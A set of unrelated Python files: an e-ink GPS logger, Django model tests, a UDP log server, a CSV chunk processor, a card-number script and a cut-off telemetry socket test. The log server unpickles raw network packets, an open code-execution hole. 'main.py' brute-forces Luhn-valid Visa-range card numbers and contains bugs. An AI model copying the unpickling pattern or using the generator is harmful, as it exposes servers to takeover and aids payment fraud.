papirus = Papirus(rotation = int(argv[0]) if len(sys.argv) > 1 else 0)
# Use smaller font for smaller displays
if papirus.height <= 96:
SIZE = 12
papirus.clear()
write_text(papirus, "Ready... 1 + 2 to exit.\n1 to start GPS\n2 to stop GPS\n4 to restart\n5 to shutdown", SIZE)
TRACKING = False
while True:
# Exit when SW1 and SW2 are pressed simultaneously
if (GPIO.input(SW1) == False) and (GPIO.input(SW2) == False) :
write_text(papirus, "Exiting ...", SIZE)
sleep(0.2)
papirus.clear()
sys.exit()
if GPIO.input(SW1) == False:
if TRACKING:
write_text(papirus, "GPS already logging.\nPress 2 to stop", SIZE)
else:
# Start tracking
g = threading.Thread(target=collect_gps,args=(papirus,SIZE,),daemon=True)
g.start()
TRACKING = True
if GPIO.input(SW2) == False:
if TRACKING:
# Stop tracking
g.join()
TRACKING = False
write_text(papirus, "Tracking ended.", SIZE)
else:
write_text(papirus, "No current GPS logging.\nPress 1 to start", SIZE)
if GPIO.input(SW3) == False:
write_text(papirus, "Three", SIZE)
if GPIO.input(SW4) == False:
write_text(papirus, "Rebooting...", SIZE)
os.system("sudo reboot")
if (SW5 != -1) and (GPIO.input(SW5) == False):
write_text(papirus, "Shutting Down at\n" + str(datetime.now()), SIZE)
os.system("sudo shutdown now -h")
sleep(0.1)
def write_text(papirus, text, size):
# initially set all white background
image = Image.new('1', papirus.size, WHITE)
# prepare for drawing
draw = ImageDraw.Draw(image)
font = ImageFont.truetype('/usr/share/fonts/truetype/freefont/FreeMonoBold.ttf', size)
# Calculate the max number of char to fit on line
line_size = (papirus.width / (size*0.65))
current_line = 0
text_lines = [""]
# Compute each line
for word in str(text).split():
# If there is space on line add the word to it
if (len(text_lines[current_line]) + len(word)) < line_size:
text_lines[current_line] += " " + word
else:
# No space left on line so move to next one
text_lines.append("")
current_line += 1
text_lines[current_line] += " " + word
current_line = 0
for l in text_lines:
current_line += 1
draw.text( (0, ((size*current_line)-size)) , l, font=font, fill=BLACK)
papirus.display(image)
papirus.partial_update()
if __name__ == '__main__':
try:
main(sys.argv[1:])
except KeyboardInterrupt:
sys.exit('interrupted')
|
tests.py
|
from __future__ import unicode_literals
import threading
import warnings
from datetime import datetime, timedelta
from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist
from django.db import DEFAULT_DB_ALIAS, DatabaseError, connections
from django.db.models.fields import Field
from django.db.models.fields.related import ForeignObjectRel
from django.db.models.manager import BaseManager
from django.db.models.query import EmptyQuerySet, QuerySet, ValuesListQuerySet
from django.test import (
TestCase, TransactionTestCase, skipIfDBFeature, skipUnlessDBFeature,
)
from django.utils import six
from django.utils.translation import ugettext_lazy
from .models import Article, ArticleSelectOnSave, SelfRef
class ModelInstanceCreationTests(TestCase):
def test_object_is_not_written_to_database_until_save_was_called(self):
a = Article(
id=None,
headline='Area man programs in Python',
pub_date=datetime(2005, 7, 28),
)
self.assertIsNone(a.id)
self.assertEqual(Article.objects.all().count(), 0)
# Save it into the database. You have to call save() explicitly.
a.save()
self.assertIsNotNone(a.id)
self.assertEqual(Article.objects.all().count(), 1)
def test_can_initialize_model_instance_using_positional_arguments(self):
"""
You can initialize a model instance using positional arguments,
which should match the field order as defined in the model.
"""
a = Article(None, 'Second article', datetime(2005, 7, 29))
a.save()
self.assertEqual(a.headline, 'Second article')
self.assertEqual(a.pub_date, datetime(2005, 7, 29, 0, 0))
def test_can_create_instance_using_kwargs(self):
a = Article(
id=None,
headline='Third article',
pub_date=datetime(2005, 7, 30),
)
a.save()
self.assertEqual(a.headline, 'Third article')
self.assertEqual(a.pub_date, datetime(2005, 7, 30, 0, 0))
def test_autofields_generate_different_values_for_each_instance(self):
a1 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
a2 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
a3 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
self.assertNotEqual(a3.id, a1.id)
self.assertNotEqual(a3.id, a2.id)
def test_can_mix_and_match_position_and_kwargs(self):
# You can also mix and match position and keyword arguments, but
# be sure not to duplicate field information.
a = Article(None, 'Fourth article', pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Fourth article')
def test_cannot_create_instance_with_invalid_kwargs(self):
six.assertRaisesRegex(
self,
TypeError,
"'foo' is an invalid keyword argument for this function",
Article,
id=None,
headline='Some headline',
pub_date=datetime(2005, 7, 31),
foo='bar',
)
def test_can_leave_off_value_for_autofield_and_it_gets_value_on_save(self):
"""
You can leave off the value for an AutoField when creating an
object, because it'll get filled in automatically when you save().
"""
a = Article(headline='Article 5', pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Article 5')
self.assertNotEqual(a.id, None)
def test_leaving_off_a_field_with_default_set_the_default_will_be_saved(self):
a = Article(pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Default headline')
def test_for_datetimefields_saves_as_much_precision_as_was_given(self):
"""as much precision in *seconds*"""
a1 = Article(
headline='Article 7',
pub_date=datetime(2005, 7, 31, 12, 30),
)
a1.save()
self.assertEqual(Article.objects.get(id__exact=a1.id).pub_date,
datetime(2005, 7, 31, 12, 30))
a2 = Article(
headline='Article 8',
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a2.save()
self.assertEqual(Article.objects.get(id__exact=a2.id).pub_date,
datetime(2005, 7, 31, 12, 30, 45))
def test_saving_an_object_again_does_not_create_a_new_object(self):
a = Article(headline='original', pub_date=datetime(2014, 5, 16))
a.save()
current_id = a.id
a.save()
self.assertEqual(a.id, current_id)
a.headline = 'Updated headline'
a.save()
self.assertEqual(a.id, current_id)
def test_querysets_checking_for_membership(self):
headlines = [
'Area man programs in Python', 'Second article', 'Third article']
some_pub_date = datetime(2014, 5, 16, 12, 1)
for headline in headlines:
Article(headline=headline, pub_date=some_pub_date).save()
a = Article(headline='Some headline', pub_date=some_pub_date)
a.save()
# You can use 'in' to test for membership...
self.assertIn(a, Article.objects.all())
# ... but there will often be more efficient ways if that is all you need:
self.assertTrue(Article.objects.filter(id=a.id).exists())
class ModelTest(TestCase):
def test_objects_attribute_is_only_available_on_the_class_itself(self):
six.assertRaisesRegex(
self,
AttributeError,
"Manager isn't accessible via Article instances",
getattr,
Article(),
"objects",
)
self.assertFalse(hasattr(Article(), 'objects'))
self.assertTrue(hasattr(Article, 'objects'))
def test_queryset_delete_removes_all_items_in_that_queryset(self):
headlines = [
'An article', 'Article One', 'Amazing article', 'Boring article']
some_pub_date = datetime(2014, 5, 16, 12, 1)
for headline in headlines:
Article(headline=headline, pub_date=some_pub_date).save()
self.assertQuerysetEqual(Article.objects.all().order_by('headline'),
["<Article: Amazing article>",
"<Article: An article>",
"<Article: Article One>",
"<Article: Boring article>"])
Article.objects.filter(headline__startswith='A').delete()
self.assertQuerysetEqual(Article.objects.all().order_by('headline'),
["<Article: Boring article>"])
def test_not_equal_and_equal_operators_behave_as_expected_on_instances(self):
some_pub_date = datetime(2014, 5, 16, 12, 1)
a1 = Article.objects.create(headline='First', pub_date=some_pub_date)
a2 = Article.objects.create(headline='Second', pub_date=some_pub_date)
self.assertNotEqual(a1, a2)
self.assertEqual(a1, Article.objects.get(id__exact=a1.id))
self.assertNotEqual(Article.objects.get(id__exact=a1.id), Article.objects.get(id__exact=a2.id))
@skipUnlessDBFeature('supports_microsecond_precision')
def test_microsecond_precision(self):
# In PostgreSQL, microsecond-level precision is available.
a9 = Article(
headline='Article 9',
pub_date=datetime(2005, 7, 31, 12, 30, 45, 180),
)
a9.save()
self.assertEqual(Article.objects.get(pk=a9.pk).pub_date,
datetime(2005, 7, 31, 12, 30, 45, 180))
@skipIfDBFeature('supports_microsecond_precision')
def test_microsecond_precision_not_supported(self):
# In MySQL, microsecond-level precision isn't always available. You'll
# lose microsecond-level precision once the data is saved.
a9 = Article(
headline='Article 9',
pub_date=datetime(2005, 7, 31, 12, 30, 45, 180),
)
a9.save()
self.assertEqual(
Article.objects.get(id__exact=a9.id).pub_date,
datetime(2005, 7, 31, 12, 30, 45),
)
@skipIfDBFeature('supports_microsecond_precision')
def test_microsecond_precision_not_supported_edge_case(self):
# In MySQL, microsecond-level precision isn't always available. You'll
# lose microsecond-level precision once the data is saved.
a = Article.objects.create(
headline='Article',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
self.assertEqual(
Article.objects.get(pk=a.pk).pub_date,
datetime(2008, 12, 31, 23, 59, 59),
)
def test_manually_specify_primary_key(self):
# You can manually specify the primary key when creating a new object.
a101 = Article(
id=101,
headline='Article 101',
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a101.save()
a101 = Article.objects.get(pk=101)
self.assertEqual(a101.headline, 'Article 101')
def test_create_method(self):
# You can create saved objects in a single step
a10 = Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
self.assertEqual(Article.objects.get(headline="Article 10"), a10)
def test_year_lookup_edge_case(self):
# Edge-case test: A year lookup should retrieve all objects in
# the given year, including Jan. 1 and Dec. 31.
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
self.assertQuerysetEqual(Article.objects.filter(pub_date__year=2008),
["<Article: Article 11>", "<Article: Article 12>"])
def test_unicode_data(self):
# Unicode data works, too.
a = Article(
headline='\u6797\u539f \u3081\u3050\u307f',
pub_date=datetime(2005, 7, 28),
)
a.save()
self.assertEqual(Article.objects.get(pk=a.id).headline,
'\u6797\u539f \u3081\u3050\u307f')
def test_hash_function(self):
# Model instances have a hash function, so they can be used in sets
# or as dictionary keys. Two models compare as equal if their primary
# keys are equal.
a10 = Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a11 = Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
a12 = Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
s = {a10, a11, a12}
self.assertIn(Article.objects.get(headline='Article 11'), s)
def test_field_ordering(self):
"""
Field instances have a `__lt__` comparison function to define an
ordering based on their creation. Prior to #17851 this ordering
comparison relied on the now unsupported `__cmp__` and was assuming
compared objects were both Field instances raising `AttributeError`
when it should have returned `NotImplemented`.
"""
f1 = Field()
f2 = Field(auto_created=True)
f3 = Field()
self.assertLess(f2, f1)
self.assertGreater(f3, f1)
self.assertIsNotNone(f1)
self.assertNotIn(f2, (None, 1, ''))
def test_extra_method_select_argument_with_dashes_and_values(self):
# The 'select' argument to extra() supports names with dashes in
# them, as long as you use values().
Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
dicts = Article.objects.filter(
pub_date__year=2008).extra(
select={'dashed-value': '1'}).values('headline', 'dashed-value')
self.assertEqual([sorted(d.items()) for d in dicts],
[[('dashed-value', 1), ('headline', 'Article 11')], [('dashed-value', 1), ('headline', 'Article 12')]])
def test_extra_method_select_argument_with_dashes(self):
# If you use 'select' with extra() and names containing dashes on a
# query that's *not* a values() query, those extra 'select' values
# will silently be ignored.
Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
articles = Article.objects.filter(
pub_date__year=2008).extra(select={'dashed-value': '1', 'undashedvalue': '2'})
self.assertEqual(articles[0].undashedvalue, 2)
def test_create_relation_with_ugettext_lazy(self):
"""
Test that ugettext_lazy objects work when saving model instances
through various methods. Refs #10498.
"""
notlazy = 'test'
lazy = ugettext_lazy(notlazy)
Article.objects.create(headline=lazy, pub_date=datetime.now())
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
# test that assign + save works with Promise objects
article.headline = lazy
article.save()
self.assertEqual(article.headline, notlazy)
# test .update()
Article.objects.update(headline=lazy)
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
# still test bulk_create()
Article.objects.all().delete()
Article.objects.bulk_create([Article(headline=lazy, pub_date=datetime.now())])
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
def test_emptyqs(self):
# Can't be instantiated
with self.assertRaises(TypeError):
EmptyQuerySet()
self.assertIsInstance(Article.objects.none(), EmptyQuerySet)
def test_emptyqs_values(self):
# test for #15959
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
qs = Article.objects.none().values_list('pk')
self.assertIsInstance(qs, EmptyQuerySet)
self.assertIsInstance(qs, ValuesListQuerySet)
self.assertEqual(len(qs), 0)
def test_emptyqs_customqs(self):
# A hacky test for custom QuerySet subclass - refs #17271
Article.objects.create(headline='foo', pub_date=datetime.now())
class CustomQuerySet(QuerySet):
def do_something(self):
return 'did something'
qs = Article.objects.all()
qs.__class__ = CustomQuerySet
qs = qs.none()
with self.assertNumQueries(0):
self.assertEqual(len(qs), 0)
self.assertIsInstance(qs, EmptyQuerySet)
self.assertEqual(qs.do_something(), 'did something')
def test_emptyqs_values_order(self):
# Tests for ticket #17712
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().values_list('id').order_by('id')), 0)
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().filter(
id__in=Article.objects.values_list('id', flat=True))), 0)
@skipUnlessDBFeature('can_distinct_on_fields')
def test_emptyqs_distinct(self):
# Tests for #19426
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().distinct('headline', 'pub_date')), 0)
def test_ticket_20278(self):
sr = SelfRef.objects.create()
with self.assertRaises(ObjectDoesNotExist):
SelfRef.objects.get(selfref=sr)
def test_eq(self):
self.assertEqual(Article(id=1), Article(id=1))
self.assertNotEqual(Article(id=1), object())
self.assertNotEqual(object(), Article(id=1))
a = Article()
self.assertEqual(a, a)
self.assertNotEqual(Article(), a)
def test_hash(self):
# Value based on PK
self.assertEqual(hash(Article(id=1)), hash(1))
with self.assertRaises(TypeError):
# No PK value -> unhashable (because save() would then change
# hash)
hash(Article())
class ModelLookupTest(TestCase):
def setUp(self):
# Create an Article.
self.a = Article(
id=None,
headline='Area woman programs in Python',
pub_date=datetime(2005, 7, 28),
)
# Save it into the database. You have to call save() explicitly.
self.a.save()
def test_all_lookup(self):
# Change values by changing the attributes, then calling save().
self.a.headline = 'Area man programs in Python'
self.a.save()
# Article.objects.all() returns all the articles in the database.
self.assertQuerysetEqual(Article.objects.all(),
['<Article: Area man programs in Python>'])
def test_rich_lookup(self):
# Django provides a rich database lookup API.
self.assertEqual(Article.objects.get(id__exact=self.a.id), self.a)
self.assertEqual(Article.objects.get(headline__startswith='Area woman'), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7, pub_date__day=28), self.a)
self.assertEqual(Article.objects.get(pub_date__week_day=5), self.a)
def test_equal_lookup(self):
# The "__exact" lookup type can be omitted, as a shortcut.
self.assertEqual(Article.objects.get(id=self.a.id), self.a)
self.assertEqual(Article.objects.get(headline='Area woman programs in Python'), self.a)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2005),
['<Article: Area woman programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2004),
[],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2005, pub_date__month=7),
['<Article: Area woman programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__week_day=5),
['<Article: Area woman programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__week_day=6),
[],
)
def test_does_not_exist(self):
# Django raises an Article.DoesNotExist exception for get() if the
# parameters don't match any object.
six.assertRaisesRegex(
self,
ObjectDoesNotExist,
"Article matching query does not exist.",
Article.objects.get,
id__exact=2000,
)
# To avoid dict-ordering related errors check only one lookup
# in single assert.
self.assertRaises(
ObjectDoesNotExist,
Article.objects.get,
pub_date__year=2005,
pub_date__month=8,
)
six.assertRaisesRegex(
self,
ObjectDoesNotExist,
"Article matching query does not exist.",
Article.objects.get,
pub_date__week_day=6,
)
def test_lookup_by_primary_key(self):
# Lookup by a primary key is the most common case, so Django
# provides a shortcut for primary-key exact lookups.
# The following is identical to articles.get(id=a.id).
self.assertEqual(Article.objects.get(pk=self.a.id), self.a)
# pk can be used as a shortcut for the primary key name in any query.
self.assertQuerysetEqual(Article.objects.filter(pk__in=[self.a.id]),
["<Article: Area woman programs in Python>"])
# Model instances of the same type and same ID are considered equal.
a = Article.objects.get(pk=self.a.id)
b = Article.objects.get(pk=self.a.id)
self.assertEqual(a, b)
def test_too_many(self):
# Create a very similar object
a = Article(
id=None,
headline='Area man programs in Python',
pub_date=datetime(2005, 7, 28),
)
a.save()
self.assertEqual(Article.objects.count(), 2)
# Django raises an Article.MultipleObjectsReturned exception if the
# lookup matches more than one object
six.assertRaisesRegex(
self,
MultipleObjectsReturned,
"get\(\) returned more than one Article -- it returned 2!",
Article.objects.get,
headline__startswith='Area',
)
six.assertRaisesRegex(
self,
MultipleObjectsReturned,
"get\(\) returned more than one Article -- it returned 2!",
Article.objects.get,
pub_date__year=2005,
)
six.assertRaisesRegex(
self,
MultipleObjectsReturned,
"get\(\) returned more than one Article -- it returned 2!",
Article.objects.get,
pub_date__year=2005,
pub_date__month=7,
)
class ConcurrentSaveTests(TransactionTestCase):
available_apps = ['basic']
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_concurrent_delete_with_save(self):
"""
Test fetching, deleting and finally saving an object - we should get
an insert in this case.
"""
a = Article.objects.create(headline='foo', pub_date=datetime.now())
exceptions = []
def deleter():
try:
# Do not delete a directly - doing so alters its state.
Article.objects.filter(pk=a.pk).delete()
except Exception as e:
exceptions.append(e)
finally:
connections[DEFAULT_DB_ALIAS].close()
self.assertEqual(len(exceptions), 0)
t = threading.Thread(target=deleter)
t.start()
t.join()
a.save()
self.assertEqual(Article.objects.get(pk=a.pk).headline, 'foo')
class ManagerTest(TestCase):
QUERYSET_PROXY_METHODS = [
'none',
'count',
'dates',
'datetimes',
'distinct',
'extra',
'get',
'get_or_create',
'update_or_create',
'create',
'bulk_create',
'filter',
'aggregate',
'annotate',
'complex_filter',
'exclude',
'in_bulk',
'iterator',
'earliest',
'latest',
'first',
'last',
'order_by',
'select_for_update',
'select_related',
'prefetch_related',
'values',
'values_list',
'update',
'reverse',
'defer',
'only',
'using',
'exists',
'_insert',
'_update',
'raw',
]
def test_manager_methods(self):
"""
This test ensures that the correct set of methods from `QuerySet`
are copied onto `Manager`.
It's particularly useful to prevent accidentally leaking new methods
into `Manager`. New `QuerySet` methods that should also be copied onto
`Manager` will need to be added to `ManagerTest.QUERYSET_PROXY_METHODS`.
"""
self.assertEqual(
sorted(BaseManager._get_queryset_methods(QuerySet).keys()),
sorted(self.QUERYSET_PROXY_METHODS),
)
class SelectOnSaveTests(TestCase):
def test_select_on_save(self):
a1 = Article.objects.create(pub_date=datetime.now())
with self.assertNumQueries(1):
a1.save()
asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now())
with self.assertNumQueries(2):
asos.save()
with self.assertNumQueries(1):
asos.save(force_update=True)
Article.objects.all().delete()
with self.assertRaises(DatabaseError):
with self.assertNumQueries(1):
asos.save(force_update=True)
def test_select_on_save_lying_update(self):
"""
Test that select_on_save works correctly if the database
doesn't return correct information about matched rows from
UPDATE.
"""
# Change the manager to not return "row matched" for update().
# We are going to change the Article's _base_manager class
# dynamically. This is a bit of a hack, but it seems hard to
# test this properly otherwise. Article's manager, because
# proxy models use their parent model's _base_manager.
orig_class = Article._base_manager.__class__
class FakeQuerySet(QuerySet):
# Make sure the _update method below is in fact called.
called = False
def _update(self, *args, **kwargs):
FakeQuerySet.called = True
super(FakeQuerySet, self)._update(*args, **kwargs)
return 0
class FakeManager(orig_class):
def get_queryset(self):
return FakeQuerySet(self.model)
try:
Article._base_manager.__class__ = FakeManager
asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now())
with self.assertNumQueries(3):
asos.save()
self.assertTrue(FakeQuerySet.called)
# This is not wanted behavior, but this is how Django has always
# behaved for databases that do not return correct information
# about matched rows for UPDATE.
with self.assertRaises(DatabaseError):
asos.save(force_update=True)
with self.assertRaises(DatabaseError):
asos.save(update_fields=['pub_date'])
finally:
Article._base_manager.__class__ = orig_class
class ModelRefreshTests(TestCase):
def _truncate_ms(self, val):
# MySQL < 5.6.4 removes microseconds from the datetimes which can cause
# problems when comparing the original value to that loaded from DB
return val - timedelta(microseconds=val.microsecond)
def test_refresh(self):
a = Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
Article.objects.filter(pk=a.pk).update(headline='new headline')
with self.assertNumQueries(1):
a.refresh_from_db()
self.assertEqual(a.headline, 'new headline')
orig_pub_date = a.pub_date
new_pub_date = a.pub_date + timedelta(10)
Article.objects.update(headline='new headline 2', pub_date=new_pub_date)
with self.assertNumQueries(1):
a.refresh_from_db(fields=['headline'])
self.assertEqual(a.headline, 'new headline 2')
self.assertEqual(a.pub_date, orig_pub_date)
with self.assertNumQueries(1):
a.refresh_from_db()
self.assertEqual(a.pub_date, new_pub_date)
def test_refresh_fk(self):
s1 = SelfRef.objects.create()
s2 = SelfRef.objects.create()
s3 = SelfRef.objects.create(selfref=s1)
s3_copy = SelfRef.objects.get(pk=s3.pk)
s3_copy.selfref.touched = True
s3.selfref = s2
s3.save()
with self.assertNumQueries(1):
s3_copy.refresh_from_db()
with self.assertNumQueries(1):
# The old related instance was thrown away (the selfref_id has
# changed). It needs to be reloaded on access, so one query
# executed.
self.assertFalse(hasattr(s3_copy.selfref, 'touched'))
self.assertEqual(s3_copy.selfref, s2)
def test_refresh_null_fk(self):
s1 = SelfRef.objects.create()
s2 = SelfRef.objects.create(selfref=s1)
s2.selfref = None
s2.refresh_from_db()
self.assertEqual(s2.selfref, s1)
def test_refresh_unsaved(self):
pub_date = self._truncate_ms(datetime.now())
a = Article.objects.create(pub_date=pub_date)
a2 = Article(id=a.pk)
with self.assertNumQueries(1):
a2.refresh_from_db()
self.assertEqual(a2.pub_date, pub_date)
self.assertEqual(a2._state.db, "default")
def test_refresh_no_fields(self):
a = Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
with self.assertNumQueries(0):
a.refresh_from_db(fields=[])
class TestRelatedObjectDeprecation(TestCase):
def test_field_related_deprecation(self):
field = SelfRef._meta.get_field('selfref')
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter('always')
self.assertIsInstance(field.related, ForeignObjectRel)
self.assertEqual(len(warns), 1)
self.assertEqual(
str(warns.pop().message),
'Usage of field.related has been deprecated. Use field.rel instead.'
)
|
log_server.py
|
#!/usr/bin/env python3
'''
A UDP logging server.
Received messages are written to sys.stdout and a file. It exits gracefully on
SIGINT (Ctrl+C) signal.
Note: it runs only on Python>=3.6.
'''
import os
import sys
import signal
import pickle
import logging
import threading
import socketserver
LOG_SERVER_HOST = '0.0.0.0'
LOG_SERVER_PORT = int(os.getenv(
'LOG_SERVER_PORT',
default='60000'
))
LOG_FILENAME = 'udp_server.log'
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler(filename=LOG_FILENAME, mode='w')
ch = logging.StreamHandler(stream=sys.stdout)
fh.setLevel(logging.DEBUG)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'[%(asctime)s:%(levelname)s:%(hostname)s:P%(process)d'
':%(filename)s:%(lineno)d:%(funcName)s()]'
': %(message)s'
)
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
class LogRecordUDPHandler(socketserver.DatagramRequestHandler):
def handle(self):
obj = pickle.loads(self.packet[4:])
record = logging.makeLogRecord(obj)
logger.handle(record)
class LogRecordUDPServer(socketserver.UDPServer):
def __init__(self, *args, **kwargs):
signal.signal(signal.SIGINT, self.signal_sigint_handler)
signal.signal(signal.SIGTERM, self.signal_sigint_handler)
super().__init__(*args, **kwargs)
def signal_sigint_handler(self, sig, frame):
print('Ctrl+C pressed! Terminating...')
self.shutdown()
def run(self,):
# in order to call self.shutdown(), self.serve_forever() needs to be
# running on a separate thread to avoid a deadlock, as per
# socketserver.BaseServer.shutdown() docstring
t = threading.Thread(target=self.serve_forever)
t.start()
t.join()
if __name__ == '__main__':
print('Running log server on {}:{}. Press Ctrl+C to exit.'.format(
LOG_SERVER_HOST, LOG_SERVER_PORT
))
addr = (LOG_SERVER_HOST, LOG_SERVER_PORT)
with LogRecordUDPServer(addr, LogRecordUDPHandler) as server:
server.run()
|
data_io_chunks.py
|
import itertools
import multiprocessing
from csv import DictReader, DictWriter
from multiprocessing import Queue
STOP = 1
def grouper(n, iterable):
it = iter(iterable)
while True:
chunk = tuple(itertools.islice(it, n))
if not chunk:
return
yield chunk
class DataIOChunks:
def __init__(self):
self.reader_queue = multiprocessing.Queue(maxsize=10)
reader_process = multiprocessing.Process(target=self.csv_reader, args=(self.reader_queue,))
reader_process.start()
self.writer_queue = multiprocessing.Queue(maxsize=10)
writer_process = multiprocessing.Process(target=self.csv_writer, args=(self.writer_queue,))
writer_process.start()
def process(self, process_chunk_func):
while True:
chunk = self.reader_queue.get()
print(len(chunk))
if chunk == STOP:
break
print("Chunk size", len(chunk))
new_ch = process_chunk_func(chunk)
self.writer_queue.put(new_ch)
self.reader_queue.join()
self.writer_queue.join()
def csv_writer(self, queue: Queue):
with open("../../../data/events_sorted_trans.csv", "wt") as out:
first_row = True
while True:
output_obs = queue.get()
if output_obs == STOP:
break
if first_row:
dw = DictWriter(out, fieldnames=output_obs[0].keys())
dw.writeheader()
first_row = False
dw.writerows(output_obs)
def csv_reader(self, queue: Queue, chunk_size=10000, limit=None):
with open("../../../data/events_sorted.csv") as inp:
dr = DictReader(inp)
print("Reading rows")
for ch in grouper(chunk_size, dr):
queue.put(ch)
queue.put(STOP)
|
main.py
|
#import required librarys
import logging
import threading
import time
#ask the user how many threads to run
while True:
try:
threadAmount = int(input("How many Threads? (1-8): "))
break
except:
print("Enter a number stupid")
#define the number generating thread
def thread_function(name):
logging.info("Thread %s: starting", name)
#defines how to check if the card if valid using the Luhn Algorithm
def checkLuhn(cardNo):
nDigits = len(cardNo)
nSum = 0
isSecond = False
for i in range(nDigits - 1, -1, -1):
d = ord(cardNo[i]) - ord('0')
if isSecond:
d = d * 2
# We add two digits to handle
# cases that make two digits after
# doubling
nSum += d // 10
nSum += d % 10
isSecond = not isSecond
return (nSum % 10 == 0)
def listtostring(s):
str1 = ""
for ele in s:
str1 += ele
return str1
cardNoArr = []
counter = 0
counter2 = 0
#defines what ranges to use for each thread
ave1 = [4000000000000000,4125000000000000,4250000000000000,4375000000000000,4500000000000000,4625000000000000,4750000000000000,4875000000000000]
ave2 = [4125000000000000,4250000000000000,4375000000000000,4500000000000000,4625000000000000,4750000000000000,4875000000000000,5000000000000000]
f = open("cards{}.txt".format(index), "a+")
f.close()
f = open("cards{}.txt".format(index), "r")
#defines the start and endpoint of this particular thread by getting it from the array using the index variable
lines = f.read().splitlines()
try:
startN = int(lastline)
lastline = lines[-2]
except:
startN = int(ave1[index])
endN = int(ave2[index])
logging.info("Thread {0}: Start: {1}".format(index,startN))
logging.info("Thread {0}: End: {1}".format(index,endN))
#opens the cardfile for this particular thread
cardfile = open("cards{}.txt".format(index), "a+")
#starts to check card numbers using the range provided in startN and endN
for cardNoint, _ in enumerate(range(startN,endN), start=startN):
cardNo = str(cardNoint)
if (checkLuhn(cardNo)):
counter += 1
if counter < 10000:
cardNoArr.append(cardNo)
cardNoArr.append("\n")
else:
cardfile.write(listtostring(cardNoArr))
cardNoArr = []
#logs when thread finishes
logging.info("Thread %s: finished",index)
if __name__ == "__main__":
#sets up some logging stuff
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO,
datefmt="%H:%M:%S")
#runs the amount of threads defined by threadAmount
threads = []
for index in range(threadAmount):
logging.info("Main : create and start thread %d.", index)
x = threading.Thread(target=thread_function, args=(index,))
threads.append(x)
x.start()
time.sleep(1)
|
test_socket.py
|
import queue
import socket
import threading
import unittest
import racetools.errors
import racetools.telemetry.pcars.udp as pcars_udp
class Socket(pcars_udp.Socket):
def __init__(self):
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
self._socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
def close(self) -> None:
self._socket.close()
def send(self, packet: bytes) -> None:
self._socket.sendto(packet, ('127.0.0.1', pcars_udp.PORT))
class TestSocket(unittest.TestCase):
def setUp(self) -> None:
self._terminate_thread = threading.Event()
self._socket = Socket()
self.packets = queue.Queue()
self._thread = threading.Thread(target=self._send_packet)
self._thread.start()
def tearDown(self) -> None:
self._terminate_thread.set()
self._thread.join()
self._socket.close()
def _send_packet(self):
while not self._terminate_thread.is_set():
try:
packet = self.packets.get(timeout=0.01)
if packet:
self._socket.send(packet)
self.packets.task_done()
except queue.Empty:
continue
def test_valid_packets(self):
with pcars_udp.Socket() as udp_socket:
self.packets.put(pcars_udp.TelemetryData(
base=pcars_udp.PacketBase(
packet_type=pcars_udp.TelemetryData.TYPE,
